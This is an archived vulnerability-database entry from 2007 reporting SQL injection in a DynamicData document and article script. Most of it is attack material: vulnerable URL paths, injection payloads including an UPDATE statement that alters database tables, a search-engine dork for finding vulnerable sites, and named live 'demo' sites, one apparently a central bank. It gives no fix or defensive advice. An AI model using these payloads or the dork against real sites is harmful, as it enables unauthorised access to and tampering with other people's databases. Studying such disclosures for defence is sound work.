Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17676
HistoryAug 03, 2007 - 12:00 a.m.

DynamicData(dms)Document&Article Script /dm_browse.asp.asp sql injection

2007-08-0300:00:00
vulners.com
47

DynamicData(dms)Document&Article Script /dm_browse.asp.asp sql injection

Credit : CodeXpLoder'tq

mail : codexploder[at]hotmail[dot]com

site : Biyosecurity.net,expw0rm.com

thx : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"


1-) example.com/[patch]/dm_browse.asp?pid=(sql methot)

1-) example.com/dms/dm_browse.asp?pid=(sql methot)

1-) example.com/dynamicdata/dm_browse.asp?pid=(sql methot)

1-) example.com/dm_filedetails.asp?did=


example.com/dms/dm_browse.asp?pid=1'

example.com/dynamicdata/dm_browse.asp?pid=1'

example.com/dm_filedetails.asp?did=1'

1' or 1 having 1=1

example.com/dms/dm_browse.asp?pid=1+update+tbl+set+col='text';–

example.com/dynamicdata/dm_browse.asp?pid=1+update+tbl+set+col='text';–

example.com/dm_filedetails.asp?did=1+update+tbl+set+col='text';–


sourge site : http://racinebizservices.com/dynamicdata/dm_browse.asp

demo site : http://www.centralbank.org.bz/

order code for views sites :inurl:"dm_browse.asp?pid" "dm_filedetails.asp?did"